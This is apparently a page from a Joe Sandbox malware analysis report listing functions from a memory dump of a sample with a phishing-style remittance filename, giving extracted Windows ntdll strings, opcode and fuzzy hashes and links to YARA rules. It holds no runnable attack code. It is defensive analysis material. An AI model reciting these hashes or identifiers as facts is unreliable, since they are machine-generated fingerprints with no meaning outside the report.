                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-1783798831
                                            • Opcode ID: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                            • Instruction ID: 0cdc558da4beae4c2f49c5474cf51f6baad59d87f76cd0ec0c469cdda50edfba
                                            • Opcode Fuzzy Hash: 3c14463bd9e56c1b84dde3324732999c676069b23dfbd09f7d705fa18229ae1e
                                            • Instruction Fuzzy Hash: 5B4102B1944305ABC722EB68DC48B5BBBE8EF94B54F10492EF948D7295E730D900CB92
                                            Function 0184C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                            Download Yara Rule
                                            Strings
                                            • PreferredUILanguages, xrefs: 0184C212
                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0184C1C5
                                            • @, xrefs: 0184C1F1
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                            • API String ID: 0-2968386058
                                            • Opcode ID: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                            • Instruction ID: c6080cd6b216677ce114bb2e7ad0d3dd8605179ab84eadedfe5a054d431ecf2b
                                            • Opcode Fuzzy Hash: 08a8282af26bc21e2dbc4fc5676b583454c81c5918061c1580ec2ee0d8995acb
                                            • Instruction Fuzzy Hash: 16416271E0121EABDB11DED9C855BEEFBBCAB14704F14416AE609E7280EBB49B448B50
                                            Function 01824144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                            • API String ID: 0-1373925480
                                            • Opcode ID: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                            • Instruction ID: a18def77393db30abc19ec269e1966914c300e8bbaceaca2f52516aa4819af0f
                                            • Opcode Fuzzy Hash: 568f74b13463629be769e12e49532ad4ddf0cba7792282ca7ca70783cc650bcd
                                            • Instruction Fuzzy Hash: B0412631A00668CBEB27DBE9C844BADFBB8FF56344F240559D901EB781D7748A81CB61
                                            Function 01814755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                            Download Yara Rule
                                            Strings
                                            • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01814888
                                            • minkernel\ntdll\ldrredirect.c, xrefs: 01814899
                                            • LdrpCheckRedirection, xrefs: 0181488F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                            • API String ID: 0-3154609507
                                            • Opcode ID: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
                                            • Instruction ID: 9ebadc0f0a0be3fd78143a923202b5cb2603f1b7ac3250b31daf65ed3d0f6809
                                            • Opcode Fuzzy Hash: fc71b5e7fecec430933b27e4a4de4a0597f46984db360a26d6a49026d3212adf
                                            • Instruction Fuzzy Hash: 3341E273A042558FCB22DF1DD840A26BBECAF49B54F090A6DED49D7319E730DA00CB81
                                            Function 017A0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                            • Instruction ID: 1a3bc0e3b04cefb6ea62c282362529b482891bf47b4341d6edeb8caec9a55064
                                            • Opcode Fuzzy Hash: c1623926aafe7ab0acc30d5b95224098f095ce1dad853001328b30054351c395
                                            • Instruction Fuzzy Hash: 8311DC31359102DFDB29DA18C854B7AF3A4EF80A16F1886ADF906CB255DB34E840C755
                                            Function 018120DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 018120FA
                                            • Process initialization failed with status 0x%08lx, xrefs: 018120F3
                                            • minkernel\ntdll\ldrinit.c, xrefs: 01812104
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                            • Instruction ID: c214b9b2c1799054da273496ef929458a08e6d6758b2cea98c1c0795e6bf5441
                                            • Opcode Fuzzy Hash: 7fd4223bee133bd10622329b15ef74172662bc9e3f5d1f33ad1c3555a70b69a0
                                            • Instruction Fuzzy Hash: 6DF02875640308ABEB20E60CCC56F99B76CFB40B04F200068FA00B7285D1B0EB40CA41
                                            Function 017A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                            • Instruction ID: 09efe670fbb5b4bce81f99dc862a7db26621d30a0b97fa7a99b3c47cc4c6c0db
                                            • Opcode Fuzzy Hash: f95a3a8c57fb841490bb7549d4c388d3dce522b84deec8ec40a9609b0ccca525
                                            • Instruction Fuzzy Hash: 9F714C71A0014A9FDB01DFA8C994FAEB7F8BF48704F144169EA05E7255EA34EE41CBA1
                                            Function 0179A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrResSearchResource Enter, xrefs: 0179AA13
                                            • LdrResSearchResource Exit, xrefs: 0179AA25
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                            • Instruction ID: 7a0ca3351cd718a0b0ed2628251d6e6376d39863d6257fb14ca37096c6e30403
                                            • Opcode Fuzzy Hash: 9776da6fae2d853ec10cfcbac64a464b4212714fc4276958faa65c609341912c
                                            • Instruction Fuzzy Hash: 15E18F71A05219ABEF22CE9DD984BAEFBBAFF14314F10456AEA01E7241D738D944CB50
                                            Function 0185A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 0f7d451e24f36911df043c659d93df19f144587567b65ea8cc9036e1ce32ada9
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 12C1D1312043469BE768CE28C884B6BBBE5EFC4358F044A2DFA95C7291D775D605CB52
                                            Function 0180E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                            • Instruction ID: b3922b293bd7796f9a00fae1dc24da71a70f29acede62e6470b9205829499f68
                                            • Opcode Fuzzy Hash: 9559308b011c8cced47c74634912fdf9e3df6560e487f2bdfb2bf417ac7116ef
                                            • Instruction Fuzzy Hash: E0615D71E0420D9FDB65DFA8CD40BAEBBB9FB48704F54486DE649EB291D731AA00CB50
                                            Function 018343D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                            • Instruction ID: 6d66293c7e495cf328e8f40f368691a22f0c88d7732c10f0f6f4f27c28f730df
                                            • Opcode Fuzzy Hash: 778545045eb8090d0cfbe9da932445794efdeb474d284a128d9ecaf7ea91dd7a
                                            • Instruction Fuzzy Hash: F4512771E0021DAEDF11DFA9CC84AEEBBB9EB44754F140529E611F7291D7349A05CBA0
                                            Function 017904E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • kLsE, xrefs: 01790540
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0179063D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                            • Instruction ID: 4bcdcca67a9335fc97ef39e64c92672c04f17d5dea846e22f42786d22a44b48c
                                            • Opcode Fuzzy Hash: bc8f88606cbfb0c1948b5d73b5c13d76e2dbe31950a11fc51082ec37e1c5cc2f
                                            • Instruction Fuzzy Hash: 2651C3715247428FDB24DF68D5446A7FBE9AF84304F20483EFA9987241E770D549CF92
                                            Function 0179A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0179A309
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0179A2FB
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                            • Instruction ID: b9e813c488e399a3f9f31fe01941bdddf2bd5629a18f2bafcd73102a10cff162
                                            • Opcode Fuzzy Hash: 84ea15f7dc96161ed2e1dfa7aded8d60c5d0331d5c5df3f7322cb7801b59e8ea
                                            • Instruction Fuzzy Hash: A341AD31A05649DBDB11CF59D840B6AFBB4FF84704F2440A9EE00DB396E6B5D944CB51
                                            Function 017CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                            • Instruction ID: db789ca484bee845fe88cc1eed50094a3ffa285c3f5953efc22fad6003ac4ada
                                            • Opcode Fuzzy Hash: a6e2c7eb6559aec7cd7fbcd0e48aeb709e555061d588c4b19f3331d9f05d6e33
                                            • Instruction Fuzzy Hash: 1501D1B2250748AFD311DF14CD49B16B7E8EB84B1AF01893DA648D7190F334D904DB46
                                            Function 0179C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                            • Instruction ID: cffe779060cad33ef8b83a14bcd37dc6a8e5eab38ca9c53cd1df0fd3ca884190
                                            • Opcode Fuzzy Hash: 6d79e0e2f6d03bf58893a09a70a6a54c2362c6285c54507c682205f53a6bc30a
                                            • Instruction Fuzzy Hash: B2825A75E002198BEF25CFADE884BEDFBB5BF48310F1481A9D919AB351D7309989CB50
                                            Function 01816420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                            • Instruction ID: 8c7b343a678121bbdeadf6caf9144c03065a1c1cdd63194e9632cdf5d20365e9
                                            • Opcode Fuzzy Hash: c53e960c48be9292e6664a35305ee2cf05aea51dbeaa80b471181cc61cb280c5
                                            • Instruction Fuzzy Hash: 5E915172941219AFEB21DB99CD85FEEBBB8EF54750F200455F600EB199E774AA00CB60
                                            Function 0183E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                            • Instruction ID: 2bf0f45f3105299221c8653d3b85495fe73ba689fe07a5a1c7fa3dcf7b24f06f
                                            • Opcode Fuzzy Hash: 78d18a3cf6a12da242adc65a54ece6d847537cab0b492ec0140d5c6a3f045df7
                                            • Instruction Fuzzy Hash: DA918D31901609BFDB22AFA5DC88FAFBB79EF85744F180029F505E7251EB749A01CB91
                                            Function 017CA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                            • Instruction ID: 65d6f1f95800b5bf34deccbfe5afdfef89539f7c4c71030e67f9b387649c744d
                                            • Opcode Fuzzy Hash: 2a46058e0e0676df98826bcc318d2b9338b6ea14fc4c9a8eea24fda9a50a8025
                                            • Instruction Fuzzy Hash: 96715CB5E0021E8BDF69CF9CC9906ADBBB1BF48710F24812EE505E7285F7319A51CB60
                                            Function 01834978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                            • Instruction ID: 3d2a491c0810c093b08fc358e23ed3ed8301f6750efe60b008e9683c91fe3c82
                                            • Opcode Fuzzy Hash: 745f27a91005e194f34c851b6409895c4685838125971c5315695b0638eaa57f
                                            • Instruction Fuzzy Hash: D251B572D0022A9BDF14DF99D844AAEFBB5AF44B54F094129E911FB250D3749E01CBE4
                                            Function 017AE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: 714b94090ba1534a0fac4650df9588d38da9001623a41fb8d7b8f90eb5624e8e
                                            • Instruction ID: a82e2feac899d2f5eb9a399120032cdc9330dda3464cb8c0d6b8a2324e94d323
                                            • Opcode Fuzzy Hash: 714b94090ba1534a0fac4650df9588d38da9001623a41fb8d7b8f90eb5624e8e
                                            • Instruction Fuzzy Hash: BF418072508302ABD710DA75C984B6BFBE8AFC8714F840A2DFA84D7180EB74D944C792
                                            Function 0180C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                            • Instruction ID: 138d49768027acdc468ab5486230832e62394595c2dd3a00607d54802bcfc913
                                            • Opcode Fuzzy Hash: 6d42243c7ef8ce431e805614f002a88522f618e4f2ce72c74cc45698b90eec44
                                            • Instruction Fuzzy Hash: 4C4163B1D0012DABDB61DE54CC84FDEB77CAB45714F0046E5AB08AB181DB709F898FA9
                                            Function 01826B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: 6394579979ca45408940280d259326e9d4d4b9c10d4da54a85853d63dfc28400
                                            • Instruction ID: d90860e9044557de93ff3448c1e6687f077f28804db26a99ebf16587b2615245
                                            • Opcode Fuzzy Hash: 6394579979ca45408940280d259326e9d4d4b9c10d4da54a85853d63dfc28400
                                            • Instruction Fuzzy Hash: 26314C31A003699BDB23EF68C844BEEBBB8DF44704F604028ED41EB282E775DA45CB50
                                            Function 0181892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0181895E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                            • Instruction ID: d2ffa2581a9c7cf945c2de7f69fe33c4a8bc903ff6b5f3d2f0be441228b6bed1
                                            • Opcode Fuzzy Hash: 8d01479b4beb854d622a6f5c2978983ccfd6fea917edb62bf85399879c29af18
                                            • Instruction Fuzzy Hash: B0012B337402059BE7206F5DDCC5A6ABF6EEF83764F04001CF641C6159CF206A84CB92
                                            Function 01832000 Relevance: .8, Instructions: 757COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                            • Instruction ID: ad7b41d94a237d7510542b45558974296d8ef7c83e2f79b5e50ad659febde1da
                                            • Opcode Fuzzy Hash: 380e57de1df12bc6331ac31d9552d6462041ee8169c0dabbb4354c0497ca3138
                                            • Instruction Fuzzy Hash: 19429D316083419BE725CF68C890A6BBBE6BFC8704F0C492DFA96D7250D771DA45CB92
                                            Function 01828158 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                            • Instruction ID: 52bd382112e84bc16b1905f6782d420ed26b7241e6945e1e89934d74c76920cc
                                            • Opcode Fuzzy Hash: a73d676aac71c33aaf5a0de26882e7fc3cb762ffa794bacb32aa8d8e1bc2be02
                                            • Instruction Fuzzy Hash: 16424D75E002298FEF25CF69C885BADBBF5BF49300F148199E949EB242D7349A85CF50
                                            Function 017A2840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                            • Instruction ID: 8635092439eec512f6dd50a01201842dc3d992986b7ed185200f6401b1b23195
                                            • Opcode Fuzzy Hash: 4789ab5b7f25f7482fc8419e5be2635c831ff034af24b45683284839882141b4
                                            • Instruction Fuzzy Hash: B832BC70A007558BEB25CF69C8447BEFBF2BF84704F24411DE6869B385DB35A942CB50
                                            Function 0183A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                            • Instruction ID: 1d4ba188e428942faa4dc0d004d249c014300e567f4039eaf916fa95556fd8db
                                            • Opcode Fuzzy Hash: dd2daf091a0908c41d4a071ef04b3cd8a8f8932307c5279fece8a3209b292a7f
                                            • Instruction Fuzzy Hash: 7F22DE742046658BEB29CF2DC094376BBF1AF85304F0C845AE9C6CF286E775D642DBA0
                                            Function 01796A50 Relevance: .5, Instructions: 548COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                            • Instruction ID: 1d0c2470e72c6f40f56efc047ec952b317c3a901d92a755a589dd1a22e9e9a05
                                            • Opcode Fuzzy Hash: da679a6cd3d37688eddb9da8534bf8a2d90bd93d6d26b945cf4b014d43441d89
                                            • Instruction Fuzzy Hash: E9328C75A04205CFDF25CFA8D480AAAFBF1FF48310F6486A9EA55AB351D734E845CB50
                                            Function 017B4A35 Relevance: .4, Instructions: 423COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2333103753.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1760000_4TH HIRE SOA REMITTANCE_USD280,000.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: eec81d71b443df8cc976f24c595ad2bca8d41bf519fc4ae858ee2b7a643bee2f
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: 13F14071E0021A9BDB15CFA9C594BEEFBF5AF48710F088169EA06AB345E774D841CB60
                                            Function 0182892B Relevance: .4, Instructions: 386COMMON
